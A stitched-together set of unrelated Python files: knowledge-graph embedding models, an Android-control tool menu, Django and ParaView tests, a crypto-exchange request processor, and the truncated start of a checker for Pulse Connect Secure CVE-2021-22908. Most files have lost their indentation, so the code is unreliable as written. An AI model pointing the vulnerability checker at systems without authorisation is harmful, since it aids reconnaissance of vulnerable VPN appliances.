E_o = tf.sparse_tensor_dense_matmul(o_weights, self.W)
R = tf.gather(self.R, p)
return E_s, R, E_o
def gather_np(self, si, pi, oi):
B = self.B[pi]
A_s = self.A[si]
A_o = self.A[oi]
s_weights = A_s.multiply(B)
s_weights /= s_weights.sum(axis=-1)
o_weights = A_o.multiply(B)
o_weights /= o_weights.sum(axis=-1)
es = np.array(sparse.csr_matrix.dot(s_weights, self.W))
eo = np.array(sparse.csr_matrix.dot(o_weights, self.W))
r = self.R[pi]
return es, r, eo
def fit(self, X, y=None):
'''
X : list/iterable of (subject, object, predicate) triplets
y : ignored (assumes all examples are positive)
'''
self.X = np.array(X)
self.ps = tf.placeholder(tf.int32, [self.batch_size])
self.p = tf.placeholder(tf.int32, [self.batch_size])
self.po = tf.placeholder(tf.int32, [self.batch_size])
self.ns = tf.placeholder(tf.int32, [self.batch_size])
self.no = tf.placeholder(tf.int32, [self.batch_size])
self.create_params()
# Note: this must be done after create_params because create_params changes nw
self.A_ps = tf.sparse_placeholder(dtype=tf.float32)
self.A_po = tf.sparse_placeholder(dtype=tf.float32)
self.A_ns = tf.sparse_placeholder(dtype=tf.float32)
self.A_no = tf.sparse_placeholder(dtype=tf.float32)
# Workaround so we don't have to rewrite all the train_score functions. Instead
# of passing in A_ps and A_po, store it in self before calling the function.
self.A_s, self.A_o = self.A_ps, self.A_po
score_pos = self.train_score(self.ps, self.p, self.po)
self.A_s, self.A_o = self.A_ns, self.A_no
score_neg = self.train_score(self.ns, self.p, self.no)
self.loss = self.train_loss(score_pos, score_neg)
self._optimize()
def _optimize(self):
if not self.weighted:
BaseModel._optimize(self)
else:
phase1_vars = tf.trainable_variables()
for var in self.phase2_vars:
phase1_vars.remove(var)
opt1 = tf.train.AdagradOptimizer(self.learning_rate).minimize(self.loss, var_list=phase1_vars)
opt2 = tf.train.AdagradOptimizer(self.learning_rate).minimize(self.loss)
self.sess = tf.Session()
init = tf.global_variables_initializer()
self.sess.run(init)
self.cur_epoch = 0
print("Optimizing - phase 1")
for epoch in range(self.epochs//4):
self._run_epoch(opt1)
print("")
print("Optimizing - phase 2")
for epoch in range(3*self.epochs//4):
self._run_epoch(opt2)
print("")
tf_objects = [getattr(self, attr) for attr in self.param_names]
vals = self.sess.run(tf_objects)
for attr,val in zip(self.param_names,vals):
setattr(self, attr, val)
self.param_names.append("A")
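# The sparse-placeholder workaround described in BaseWordVectorsModel.create_params
# amounts to slicing rows out of a SciPy CSR matrix and feeding TensorFlow the COO
# triplets (indices, values, dense_shape). The hypothetical helper below shows just
# that conversion, with no TF session involved; it mirrors _gather_A for illustration.
def _csr_rows_to_coo_triplets_sketch(A, row_idx):
    import numpy as np
    from scipy import sparse
    batch = sparse.coo_matrix(A[row_idx], dtype=np.float32)
    indices = np.array([batch.row, batch.col]).T   # [nnz, 2] (row, col) pairs
    values = batch.data                            # [nnz] nonzero values
    dense_shape = (len(row_idx), A.shape[1])       # batch rows x full vocab width
    return indices, values, dense_shape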
class TransEWordVectors(BaseWordVectorsModel):
def __init__(self, ne, nr, dim, samplef, word_ids, word_init=None, weighted=True,
pe=False, tfidf_weights=False, **kwargs):
BaseWordVectorsModel.__init__(self, ne, nr, dim, samplef, word_ids, word_init=word_init,
weighted=weighted, pe=pe, tfidf_weights=tfidf_weights, **kwargs)
def train_score(self, s, p, o):
return TransE.train_score(self, s, p, o)
def score(self, si, pi, oi):
es, r, eo = TransEWordVectors.gather_np(self, si, pi, oi)
return -np.sum(np.abs(es + r - eo), axis=-1, keepdims=False)
class TransRWordVectors(BaseWordVectorsModel):
def __init__(self, ne, nr, dim, samplef, word_ids, word_init=None, weighted=True,
pe=False, tfidf_weights=False, **kwargs):
BaseWordVectorsModel.__init__(self, ne, nr, dim, samplef, word_ids, word_init=word_init,
weighted=weighted, pe=pe, tfidf_weights=tfidf_weights, **kwargs)
def create_params(self):
BaseWordVectorsModel.create_params(self)
self._add_param("Mr", [self.nr, self.dim, self.dim])
def gather(self, s, p, o):
E_s, R, E_o = BaseWordVectorsModel.gather(self, s, p, o)
Mr = tf.gather(self.Mr, p)
return E_s, R, Mr, E_o
def gather_np(self, si, pi, oi):
es, r, eo = BaseWordVectorsModel.gather_np(self, si, pi, oi)
Mr = self.Mr[pi]
return es, r, Mr, eo
def train_score(self, s, p, o):
return TransR.train_score(self, s, p, o)
def score(self, si, pi, oi):
es, r, Mr, eo = TransRWordVectors.gather_np(self, si, pi, oi)
esp = np.matmul(es, Mr)
eop = np.matmul(eo, Mr)
return -np.sum(np.abs(esp + r - eop), axis=-1)
class RESCALWordVectors(BaseWordVectorsModel):
def __init__(self, ne, nr, dim, samplef, word_ids, word_init=None, weighted=True,
pe=False, tfidf_weights=False, **kwargs):
BaseWordVectorsModel.__init__(self, ne, nr, dim, samplef, word_ids, word_init=word_init,
weighted=weighted, pe=pe, tfidf_weights=tfidf_weights, **kwargs)
self.R_shape = [self.nr, self.dim, self.dim]
def train_score(self, s, p, o):
return RESCAL.train_score(self, s, p, o)
def score(self, si, pi, oi):
es, r, eo = RESCALWordVectors.gather_np(self, si, pi, oi)
return np.sum(np.matmul(es, r) * eo, axis=-1)
class HolEWordVectors(BaseWordVectorsModel):
def __init__(self, ne, nr, dim, samplef, word_ids, word_init=None, weighted=True,
pe=False, tfidf_weights=False, **kwargs):
BaseWordVectorsModel.__init__(self, ne, nr, dim, samplef, word_ids, word_init=word_init,
weighted=weighted, pe=pe, tfidf_weights=tfidf_weights, **kwargs)
def train_score(self, s, p, o):
return HolE.train_score(self, s, p, o)
def score(self, si, pi, oi):
es, r, eo = HolEWordVectors.gather_np(self, si, pi, oi)
return np.sum(r * np_ccorr(es, eo), axis=-1)
class SEWordVectors(BaseWordVectorsModel):
def __init__(self, ne, nr, dim, samplef, word_ids, word_init=None, weighted=True,
pe=False, tfidf_weights=False, **kwargs):
BaseWordVectorsModel.__init__(self, ne, nr, dim, samplef, word_ids, word_init=word_init,
weighted=weighted, pe=pe, tfidf_weights=tfidf_weights, **kwargs)
self.R_shape = [self.nr, self.dim, self.dim]
def create_params(self):
BaseWordVectorsModel.create_params(self)
self._add_param("R1", self.R_shape)
self._add_param("R2", self.R_shape)
def gather(self, s, p, o):
E_s, R, E_o = BaseWordVectorsModel.gather(self, s, p, o)
R1 = tf.gather(self.R1, p)
R2 = tf.gather(self.R2, p)
return E_s, E_o, R1, R2
def gather_np(self, si, pi, oi):
es, r, eo = BaseWordVectorsModel.gather_np(self, si, pi, oi)
R1 = self.R1[pi]
R2 = self.R2[pi]
return es, eo, R1, R2
def train_score(self, s, p, o):
return SE.train_score(self, s, p, o)
def score(self, si, pi, oi):
es, eo, R1, R2 = SEWordVectors.gather_np(self, si, pi, oi)
esr = np.matmul(es, R1)
eor = np.matmul(eo, R2)
return -np.sum(np.abs(esr - eor), axis=-1)
class DistMultWordVectors(BaseWordVectorsModel):
def __init__(self, ne, nr, dim, samplef, word_ids, word_init=None, weighted=True,
pe=False, tfidf_weights=False, **kwargs):
BaseWordVectorsModel.__init__(self, ne, nr, dim, samplef, word_ids, word_init=word_init,
weighted=weighted, pe=pe, tfidf_weights=tfidf_weights, **kwargs)
def train_score(self, s, p, o):
return DistMult.train_score(self, s, p, o)
def score(self, si, pi, oi):
es, r, eo = DistMultWordVectors.gather_np(self, si, pi, oi)
return np.sum(es * r * eo, axis=-1)
class BaseFeatureSumModel(BaseModel):
def __init__(self, ne, nr, dim, samplef, W_text, **kwargs):
BaseModel.__init__(self, ne, nr, dim, samplef, **kwargs)
self.orig_samplef = samplef
self.train_words = kwargs.pop("train_words",True)
self.reg = 0.0
self.W_text = W_text
self.text_dim = next(len(x) for x in W_text if x is not None)
self.R_shape = [self.nr, self.text_dim + self.dim]
def _permute_indices(self, X):
'''
Permute entity indices such that all entities with unknown text embeddings (W_text[i] is None)
occur at the end.
'''
# idx_map : old index to new index
# inv_idx_map : new index to old index
self.idx_map = [0] * self.ne
self.inv_idx_map = [0] * self.ne
self.num_unknown = sum(1 for x in self.W_text if x is None)
num_known = sum(1 for x in self.W_text if x is not None)
cnt_known = 0
cnt_unknown = 0
for i in range(self.ne):
if self.W_text[i] is None:
self.idx_map[i] = num_known + cnt_unknown
cnt_unknown += 1
else:
self.idx_map[i] = cnt_known
cnt_known += 1
self.inv_idx_map[self.idx_map[i]] = i
assert list(sorted(self.idx_map)) == list(range(self.ne))
assert list(sorted(self.inv_idx_map)) == list(range(self.ne))
# Update indices in training data x
for i in range(len(X)):
X[i] = list(X[i])
X[i][0] = self.idx_map[X[i][0]]
X[i][2] = self.idx_map[X[i][2]]
self.W_text = np.array([x for x in self.W_text if x is not None])
# IMPORTANT: Update negative sampling function to undo the permutation because
# it references the internal KnowledgeGraph representation which is not permuted.
# Then redo the permutation on the result.
def new_samplef(x, ne):
res = self.orig_samplef((self.inv_idx_map[x[0]], x[1], self.inv_idx_map[x[2]]), ne)
return (self.idx_map[res[0]], res[1], self.idx_map[res[2]])
self.samplef = new_samplef
assert len(self.W_text) + self.num_unknown == self.ne
return np.array(X)
def _unpermute_indices(self):
'''
Undo the index permutation by rearranging the rows of self.E and self.W.
'''
for attr in ["E","W"]:
arr = getattr(self,attr)
new_arr = []
for i in range(self.ne):
# i is old index, idx_map[i] is new index
new_arr.append(arr[self.idx_map[i]])
setattr(self, attr, np.array(new_arr))
def create_params(self):
# compute average L1 norm of text vector
norms = [np.mean(np.abs(vec)) for vec in self.W_text if vec is not None]
avg_norm = np.mean(norms)
self._add_param("E", self.E_shape)
self._add_param("R", self.R_shape)
if self.num_unknown > 0:
print("%i entities with unknown text embeddings" %(self.num_unknown))
W_known = tf.Variable(self.W_text, dtype=tf.float32, trainable=self.train_words)
W_unknown = tf.Variable(init_nunif([self.num_unknown, self.text_dim]), dtype=tf.float32)
self.W = tf.concat([W_known,W_unknown], axis=0, name="W")
self.phase2_vars = [W_unknown]
if self.train_words:
self.phase2_vars.append(W_known)
else:
self.W = tf.Variable(self.W_text, dtype=tf.float32, trainable=self.train_words, name="W")
self.phase2_vars = [self.W]
self.param_names.append("W")
self._regularize(self.W)
self.M = tf.Variable(np.zeros([self.text_dim,self.dim]), dtype=tf.float32, name="M")
self.phase2_vars.append(self.M)
self.param_names.append("M")
# Replace each word vector w in self.W with w x self.M so we don't have to recompute this
# multiple times when doing prediction
self.W = tf.matmul(self.W, self.M)
def gather(self, s, p, o):
E_s, R, E_o = BaseModel.gather(self, s, p, o)
W_s = tf.gather(self.W, s)
W_o = tf.gather(self.W, o)
return E_s, W_s, R, E_o, W_o
def fit(self, X, y=None):
X = self._permute_indices(X)
BaseModel.fit(self, X, y)
self._unpermute_indices()
def _optimize(self):
phase1_vars = tf.trainable_variables()
if hasattr(self,"phase2_vars"):
for var in self.phase2_vars:
phase1_vars.remove(var)
opt1 = tf.train.AdagradOptimizer(self.learning_rate).minimize(self.loss, var_list=phase1_vars)
opt2 = tf.train.AdagradOptimizer(0.01).minimize(self.loss)
self.sess = tf.Session()
init = tf.global_variables_initializer()
self.sess.run(init)
self.cur_epoch = 0
print("Optimizing - phase 1")
for epoch in range(self.epochs//2):
self._run_epoch(opt1)
print("")
print("Optimizing - phase 2")
for epoch in range(self.epochs//2):
self._run_epoch(opt2)
print("")
tf_objects = [getattr(self, attr) for attr in self.param_names]
vals = self.sess.run(tf_objects)
for attr,val in zip(self.param_names,vals):
setattr(self, attr, val)
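# BaseFeatureSumModel._permute_indices reorders entity ids so that entities without
# a text vector all land after the known ones. The hypothetical function below
# reproduces only the idx_map / inv_idx_map construction on a toy boolean mask,
# for illustration; the real method also rewrites the triplets and the sampler.
def _build_permutation_sketch(has_text):
    ne = len(has_text)
    num_known = sum(1 for known in has_text if known)
    idx_map = [0] * ne      # old index -> new index
    inv_idx_map = [0] * ne  # new index -> old index
    cnt_known = cnt_unknown = 0
    for i, known in enumerate(has_text):
        if known:
            idx_map[i] = cnt_known
            cnt_known += 1
        else:
            idx_map[i] = num_known + cnt_unknown
            cnt_unknown += 1
        inv_idx_map[idx_map[i]] = i
    return idx_map, inv_idx_map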
class TransEFeatureSum(BaseFeatureSumModel):
def __init__(self, ne, nr, dim, samplef, W_text, **kwargs):
BaseFeatureSumModel.__init__(self, ne, nr, dim, samplef, W_text, **kwargs)
self.R_shape = [self.nr, self.dim]
self.train_words = True
def train_score(self, s, p, o):
E_s, W_s, R, E_o, W_o = self.gather(s, p, o)
E_s = E_s + W_s
E_o = E_o + W_o
return -tf.reduce_sum(tf.abs(E_s + R - E_o), axis=-1)
def score(self, si, pi, oi):
es = self.E[si] + self.W[si]
eo = self.E[oi] + self.W[oi]
r = self.R[pi]
return -np.sum(np.abs(es + r - eo), axis=-1)
class RESCALFeatureSum(BaseFeatureSumModel):
def __init__(self, ne, nr, dim, samplef, W_text, **kwargs):
BaseFeatureSumModel.__init__(self, ne, nr, dim, samplef, W_text, **kwargs)
self.R_shape = [self.nr, self.dim, self.dim]
self.learning_rate = kwargs.pop("learning_rate",0.1)
self.reg = 0.01
self.train_words = True
def train_score(self, s, p, o):
E_s, W_s, R, E_o, W_o = self.gather(s, p, o)
E_s = E_s + W_s
E_o = E_o + W_o
return tf.reduce_sum(vec_mat_mul(E_s, R) * E_o, axis=-1)
def score(self, si, pi, oi):
es = self.E[si] + self.W[si]
eo = self.E[oi] + self.W[oi]
r = self.R[pi]
return np.sum(np.matmul(es, r) * eo, axis=-1)
class HolEFeatureSum(BaseFeatureSumModel):
def __init__(self, ne, nr, dim, samplef, W_text, **kwargs):
BaseFeatureSumModel.__init__(self, ne, nr, dim, samplef, W_text, **kwargs)
self.R_shape = [self.nr, self.dim]
self.learning_rate = kwargs.pop("learning_rate",0.1)
self.reg = 0.01
self.train_words = True
def train_score(self, s, p, o):
E_s, W_s, R, E_o, W_o = self.gather(s, p, o)
E_s = E_s + W_s
E_o = E_o + W_o
return tf.reduce_sum(R * tf_ccorr(E_s, E_o), axis=-1)
def score(self, si, pi, oi):
es = self.E[si] + self.W[si]
eo = self.E[oi] + self.W[oi]
r = self.R[pi]
return np.sum(r * np_ccorr(es, eo), axis=-1)
class TransRFeatureSum(BaseFeatureSumModel):
def __init__(self, ne, nr, dim, samplef, W_text, **kwargs):
BaseFeatureSumModel.__init__(self, ne, nr, dim, samplef, W_text, **kwargs)
self.R_shape = [self.nr, self.dim]
self.reg = 0.01
self.train_words = False
def create_params(self):
BaseFeatureSumModel.create_params(self)
self._add_param("Mr", self.R_shape + [self.R_shape[-1]])
def gather(self, s, p, o):
E_s, W_s, R, E_o, W_o = BaseFeatureSumModel.gather(self, s, p, o)
Mr = tf.gather(self.Mr, p)
return E_s, W_s, R, Mr, E_o, W_o
def train_score(self, s, p, o):
E_s, W_s, R, Mr, E_o, W_o = self.gather(s, p, o)
E_s = E_s + W_s
E_o = E_o + W_o
E_sr = vec_mat_mul(E_s, Mr)
E_or = vec_mat_mul(E_o, Mr)
return -tf.reduce_sum(tf.abs(E_sr + R - E_or), axis=-1)
def score(self, si, pi, oi):
es = self.E[si] + self.W[si]
eo = self.E[oi] + self.W[oi]
r = self.R[pi]
Mr = self.Mr[pi]
esp = np.matmul(es, Mr)
eop = np.matmul(eo, Mr)
return -np.sum(np.abs(esp + r - eop), axis=-1)
class SEFeatureSum(BaseFeatureSumModel):
def __init__(self, ne, nr, dim, samplef, W_text, **kwargs):
BaseFeatureSumModel.__init__(self, ne, nr, dim, samplef, W_text, **kwargs)
self.R_shape = [self.nr, self.dim, self.dim]
self.reg = 0.01
self.train_words = False
def create_params(self):
BaseFeatureSumModel.create_params(self)
self._add_param("R1", self.R_shape)
self._add_param("R2", self.R_shape)
def gather(self, s, p, o):
E_s, W_s, R, E_o, W_o = BaseFeatureSumModel.gather(self, s, p, o)
R1 = tf.gather(self.R1, p)
R2 = tf.gather(self.R2, p)
return E_s, W_s, E_o, W_o, R1, R2
def train_score(self, s, p, o):
E_s, W_s, E_o, W_o, R1, R2 = self.gather(s, p, o)
E_s = E_s + W_s
E_o = E_o + W_o
E_sr = vec_mat_mul(E_s, R1)
E_or = vec_mat_mul(E_o, R2)
return -tf.reduce_sum(tf.abs(E_sr - E_or), axis=-1)
def score(self, si, pi, oi):
es = self.E[si] + self.W[si]
eo = self.E[oi] + self.W[oi]
R1 = self.R1[pi]
R2 = self.R2[pi]
esr = np.matmul(es, R1)
eor = np.matmul(eo, R2)
return -np.sum(np.abs(esr - eor), axis=-1)
class DistMultFeatureSum(BaseFeatureSumModel):
def __init__(self, ne, nr, dim, samplef, W_text, **kwargs):
BaseFeatureSumModel.__init__(self, ne, nr, dim, samplef, W_text, **kwargs)
self.R_shape = [self.nr, self.dim]
self.train_words = True
def train_score(self, s, p, o):
E_s, W_s, R, E_o, W_o = self.gather(s, p, o)
E_s = E_s + W_s
E_o = E_o + W_o
return tf.reduce_sum(E_s * R * E_o, axis=-1)
def score(self, si, pi, oi):
es = self.E[si] + self.W[si]
eo = self.E[oi] + self.W[oi]
r = self.R[pi]
return np.sum(es * r * eo, axis=-1)
|
def opt():
import option
r = "\033[31m"
g = "\033[32m"
y = "\033[33m"
print(f"{g}[{r}0{g}]{y}list tools properties")
print(f"{g}[{r}1{g}]{y}screen")
print(f"{g}[{r}2{g}]{y}battery")
print(f"{g}[{r}3{g}]{y}activity")
print(f"{g}[{r}4{g}]{y}system info")
print(f"{g}[{r}5{g}]{y}type")
print(f"{g}[{r}6{g}]{y}net state")
print(f"{g}[{r}7{g}]{y}restart")
print(f"{g}[{r}8{g}]{y}wifi on")
print(f"{g}[{r}9{g}]{y}wifi off")
print(f"{g}[{r}10{g}]{y}openurl")
print(f"{g}[{r}11{g}]{y}adv prop")
print(f"{g}[{r}12{g}]{y}shell")
print(f"{g}[{r}13{g}]{y}download")
print(f"{g}[{r}14{g}]{y}upload")
print(f"{g}[{r}15{g}]{y}keycode")
print(f"{g}[{r}16{g}]{y}about Developer")
print(f"{g}[{r}17{g}]{y}tool not working?")
print(f"{g}[{r}18{g}]{y}add new tool")
print(f"{g}[{r}00{g}]{y}exit")
|
from django.utils.translation import gettext as _
def test_location_list(francoralite_context):
for username in francoralite_context.USERNAMES:
# Open the locations list page for each profile
francoralite_context.open_homepage(auth_username=username)
francoralite_context.open_url('/location_gis/')
# Verify the label of the location page
francoralite_context.verify_title(_('Lieux'))
# Verify buttons
has_buttons = username in francoralite_context.WRITERS
assert has_buttons == francoralite_context.exists_element(by_link_url='/location_gis/add')
# And, then logout (if authenticated user)
if username:
francoralite_context.logout(username)
def test_location_details(francoralite_context):
for username in francoralite_context.USERNAMES:
# Open the first collection page for each profile
francoralite_context.open_homepage(auth_username=username)
francoralite_context.open_url('/location_gis/1')
# Verify data
data = {
'id_code': "poitiers",
'id_latitude': '46.5802596',
'id_longitude': '0.340196',
}
francoralite_context.verify_data(data)
# Verify buttons
has_buttons = username in francoralite_context.WRITERS
assert has_buttons == francoralite_context.exists_element(by_link_url='/location_gis/edit/1')
assert has_buttons == francoralite_context.exists_element(by_button_url='/location_gis/delete/1')
# And, then logout (if authenticated user)
if username:
francoralite_context.logout(username)
def test_location_add(francoralite_context):
last_id = 3
for username in francoralite_context.WRITERS:
last_id = last_id + 1
# Open the first location page for each profile
francoralite_context.open_homepage(auth_username=username)
francoralite_context.open_url('/location_gis/')
# Click on the "add" link
francoralite_context.find_element(by_link_url='/location_gis/add').click()
# Write content
content = {
'id_code': 'cherves',
'id_name': "Cherves, Poitiers, Vienne, Nouvelle-Aquitaine, France métropolitaine, 86170, France",
'id_latitude': '46.7175881',
'id_longitude': '0.0189083',
}
francoralite_context.fill_data(content)
# Validation
francoralite_context.find_element(by_id='save').click()
# Go to the new mission
francoralite_context.open_url('/location_gis/' + str(last_id))
# Verify content
del content["id_name"]
francoralite_context.verify_data(content)
# And, then logout (if authenticated user)
if username:
francoralite_context.logout(username)
|
#### import the simple module from the paraview
from paraview.simple import *
# Create a wavelet and clip it with a Cylinder.
wavelet = Wavelet()
Show()
clip = Clip()
clip.ClipType = "Cylinder"
clip.InsideOut = True
cylinder = clip.ClipType
cylinder.Axis = [-1, 1, -1]
cylinder.Center = [8, 4, -3]
cylinder.Radius = 3
Show()
Render()
# compare with baseline image
import os
import sys
try:
baselineIndex = sys.argv.index('-B')+1
baselinePath = sys.argv[baselineIndex]
except (ValueError, IndexError):
    print("Could not get baseline directory. Test failed.")
exit(1)
baseline_file = os.path.join(baselinePath, "TestClipCylinder.png")
import vtk.test.Testing
vtk.test.Testing.VTK_TEMP_DIR = vtk.util.misc.vtkGetTempDir()
vtk.test.Testing.compareImage(GetActiveView().GetRenderWindow(), baseline_file,
threshold=25)
vtk.test.Testing.interact()
|
import threading
import time
import traceback
import ccxt
import json
import datetime
import logging
import os
import click
import uuid
import queue
import collections
import collections.abc
import etcd3
import simpleProducer
import configurationService
STOP_REQUEST = "StopRequest"
MAX_REQUEST_LAG = 100
class CcxtRequestProcessor(object):
def __init__(self, producer, status_producer, configuration_service,
listener_id, exchange, initial_key, initial_request):
self.exchange = exchange
self.queue = queue.Queue()
self.key_counter = collections.Counter()
self._listener_id = listener_id
        self._initial_key = initial_key
        self._initial_request = initial_request
self._producer = producer
self._status_producer = status_producer
self._configuration_service = configuration_service
self._exchange_api = None
self._thread = threading.Thread(target=self.run, daemon = True)
def start(self):
self._thread.start()
def stop(self):
self.queue.put(STOP_REQUEST)
def put(self, request):
lib = request['value']['lib']
exchange = request['value']['exchange']
call = request['value']['call']
args = request['value']['args']
processor_key = "{}.{}.{}.({})".format(lib, exchange, call, str(args))
self.key_counter[processor_key] += 1
request['processor_key'] = processor_key
request['request_sequence_nr'] = self.key_counter[processor_key]
self.queue.put(request)
def run(self):
try:
self._exchange_api = getattr(ccxt, self.exchange)()
self._configuration_service.put_status(
"exchange",
"{}.{}".format("ccxt", self.exchange),
{
"lib" : "ccxt",
"exchange" : self.exchange,
"start_time" : datetime.datetime.now()
})
while True:
                request = None
                request_value = None
                try:
                    request = self.queue.get(block = True)
                    if request == STOP_REQUEST:
                        break
                    request_value = request['value']
self.process_request(**request)
self.queue.task_done()
except Exception as ex:
msg = "Error processing requests to exchange {}".format(self.exchange)
logging.error(msg)
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
self._send_status_error(msg, self._listener_id, request_value, ex, trace)
except Exception as ex:
msg = "Error processing requests to exchange {}".format(self.exchange)
logging.error(msg)
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
self._send_status_error(msg, self._initial_key, self._initial_request, ex, trace)
def process_request(self, **kwargs):
request = kwargs['value']
lib = kwargs['value']['lib']
exchange = kwargs['value']['exchange']
call = kwargs['value']['call']
args = kwargs['value']['args']
key = kwargs['value']['key']
assert lib == "ccxt"
assert exchange == self.exchange
processor_key = kwargs['processor_key']
request_sequence_nr = kwargs['request_sequence_nr']
current_sequence_nr = self.key_counter[processor_key]
# skip requests if there are more requests with same key in queue
# allow some lag to ensure at least some requests are always processed
warning = None
skip = False
if request_sequence_nr < current_sequence_nr - MAX_REQUEST_LAG:
skip = True
warning_dict = {
'processor_key' : processor_key,
'request_sequence_nr' :request_sequence_nr,
'current_sequence_nr' : current_sequence_nr
}
msg = "Skipping request with processor_key={processor_key}, " \
"request_sequence_nr={request_sequence_nr}, " \
"current_sequence_nr={current_sequence_nr}".format(**warning_dict)
            logging.warning(msg)
warning = self._send_status_warn(msg, self._listener_id, request, warning_dict)
if 'request_timestamp' in kwargs['value']:
request_timestamp = kwargs['value']['request_timestamp']
else:
request_timestamp = kwargs['timestamp']
request_result = None
error = None
if not skip:
try:
request_result = getattr(self._exchange_api,call)(**args)
self.fix_keys(request_result)
except Exception as ex:
msg = "Error processing requests to exchange {}".format(self.exchange)
logging.error(msg)
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
error = self._send_status_error(msg, self._listener_id, request, ex, trace)
result={
"exchange": exchange,
"call": call,
"args": args,
"request_timestamp" : request_timestamp,
"call_timestamp" : kwargs['rec_timestamp'],
"result_timestamp" : datetime.datetime.now(),
"result" : request_result,
"ticker_id" : kwargs['value']['ticker_id'],
"key" : key,
"request_id" : kwargs['value']['request_id'],
"sequence_nr" : kwargs['value']['sequence_nr'],
"request_processor_id" : kwargs['value']['processor_id'],
"result_processor_id" : self._listener_id,
"lib" : lib
}
if warning:
del warning['details']['request']
result = {**result, **{
"warning" : warning['details'],
"status" : "warning"
}}
if error:
del error['details']['request']
result = {**result, **{
"error" : error['details'],
"status" : "error"
}}
logging.debug("Sending result {}".format(result))
logging.info("Sending result {}".format({k:result[k] for k in result if k not in set([
'result','call','args','lib'])}))
try:
self._producer.send(
key=key,
value=result)
except Exception as ex:
msg = "Error processing requests to exchange {}".format(self.exchange)
logging.error(msg)
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
self._send_status_error(msg, self._listener_id, request, ex, trace)
def fix_keys(self, dictionary, match='.', replace_by='.'):
if isinstance(dictionary, str):
return
if isinstance(dictionary, collections.abc.Mapping):
for k in list(dictionary.keys()):
if isinstance(dictionary[k], collections.abc.Mapping):
self.fix_keys(dictionary[k], match, replace_by)
elif isinstance(dictionary[k], collections.abc.Sequence):
self.fix_keys(dictionary[k], match, replace_by)
if isinstance(k, str) and k.find(match) > -1:
logging.debug("Fixing key {}".format(k))
value = dictionary[k]
new_key = k.replace(match, replace_by)
del dictionary[k]
dictionary[new_key] = value
logging.debug("Fixed key {}".format(new_key))
elif isinstance(dictionary, collections.abc.Sequence):
for item in dictionary:
self.fix_keys(item, match, replace_by)
def _send_status_error(self, msg, key, request, exception, trace):
try:
if isinstance(key, bytes):
try:
key = uuid.UUID(bytes=key)
except:
key = str(key)
status = {
"id" : key,
"result" : "exception",
"details" : {
"exception" : str(exception),
"type" : str(type(exception)),
"trace" : str(trace),
"request" : request,
"message" : msg
},
"error" : True,
"processor_id" : self._listener_id
}
self._status_producer.send(key=key, value=status)
return status
except Exception as ex:
logging.error("Error sending status")
logging.debug(ex)
logging.debug(traceback.format_exc())
def _send_status_warn(self, msg, key, request, warning_dict):
try:
if isinstance(key, bytes):
try:
key = uuid.UUID(bytes=key)
except:
key = str(key)
status = {
"id" : key,
"result" : "warning",
"details" : {**{
"request" : request,
"message" : msg
}, **warning_dict},
"warning" : True,
"processor_id" : self._listener_id
}
self._status_producer.send(key=key, value=status)
return status
except Exception as ex:
logging.error("Error sending status")
logging.debug(ex)
logging.debug(traceback.format_exc())
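# Hypothetical, illustration-only sketch of how fix_keys is typically used: it walks
# nested dicts/lists in place and rewrites any string key containing `match`. Note
# that the defaults (match='.', replace_by='.') leave keys unchanged, so a caller
# that wants to sanitize keys must pass an explicit replacement character.
def _fix_keys_usage_sketch(processor):
    payload = {"BTC.USD": {"bid.price": 1.0}, "trades": [{"a.b": 2}]}
    processor.fix_keys(payload, match=".", replace_by="_")
    # payload is now {"BTC_USD": {"bid_price": 1.0}, "trades": [{"a_b": 2}]}
    return payload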
|
class CommandLine() :
def __init__(self, inOpts=None) :
import argparse
self.parser = argparse.ArgumentParser(description = 'Extended Depth of Focus Image Processing Algorithm',
                                               epilog = 'Takes in multiple layers of image data of a given subject and produces a single in-focus image of that subject.',
add_help = True,
prefix_chars = '-',
usage = '%(prog)s [options] -option1[default] <input >output'
)
self.parser.add_argument('-i','--images',action='append',default = None, help='Select the image/folder of images you choose to run the algorithm on.')
self.parser.add_argument('-a','--algorithm', action = 'store', choices=('laplacian','sobel') , default = 'laplacian', help='Select the type of algorithm you want to run. Either Laplacian, or Sobel.' )
        self.parser.add_argument('-o','--outputD',action='store', help ='Name of the output directory to write the results to.')
        self.parser.add_argument('-n','--namingS',action = 'store', type = str, default= 'EDoFIP Output', help = 'Naming scheme to use for the output images.')
if inOpts is None :
self.args = self.parser.parse_args()
else :
self.args = self.parser.parse_args(inOpts)
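# Hypothetical, illustration-only usage sketch: CommandLine can be driven from
# sys.argv (inOpts=None) or from an explicit option list, which is convenient in
# tests. The file and directory names below are made up.
def _command_line_usage_sketch():
    cl = CommandLine(['-i', 'stack/', '-a', 'sobel', '-o', 'out/', '-n', 'run1'])
    return cl.args.images, cl.args.algorithm, cl.args.outputD, cl.args.namingS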
|
#!/usr/bin/env python3
# Utility to check for Pulse Connect Secure CVE-2021-22908
# https://www.kb.cert.org/vuls/id/667933
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import argparse
import sys
from html.parser import HTMLParser
import getpass
parser = argparse.ArgumentParser(description='Pulse Connect Secure CVE-2021-22908')
parser.add_argument('host', type=str, help='PCS IP or hostname')
parser.add_argument('-u', '--user', dest='user', type=str, help='username')
parser.add_argument('-p', '--pass', dest='password', type=str, help='password')
parser.add_argument('-r', '--realm', dest='realm', type=str, help='realm')
parser.add_argument('-d', '--dsid', dest='dsid', type=str, help='DSID')
parser.add_argument('-x', '--xsauth', dest='xsauth', type=str, help='xsauth')
parser.add_argument('-n', '--noauth', action='store_true', help='Do not authenticate. Only check for XML workaround')
args = parser.parse_args()
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class formvaluefinder(HTMLParser):
def __init__(self, searchval):
        super().__init__()
self.searchval = searchval
def handle_starttag(self, tag, attrs):
if tag == 'input':
# We're just looking for form <input> tags
foundelement = False
for attr in attrs:
if(attr[0] == 'name'):
if(attr[1] == self.searchval):
foundelement = True
elif(attr[0] == 'value' and foundelement == True):
self.data = attr[1]
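# Hypothetical, illustration-only sketch of how formvaluefinder is used further
# below: feed it HTML and it captures the value attribute of the named <input>.
def _formvaluefinder_usage_sketch():
    finder = formvaluefinder('realm')
    finder.feed('<form><input name="realm" value="Users"></form>')
    return finder.data  # -> 'Users'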
class preauthfinder(HTMLParser):
foundelement = False
def handle_starttag(self, tag, attrs):
if tag == 'textarea':
# We're just looking for <textarea> tags
foundelement = False
for attr in attrs:
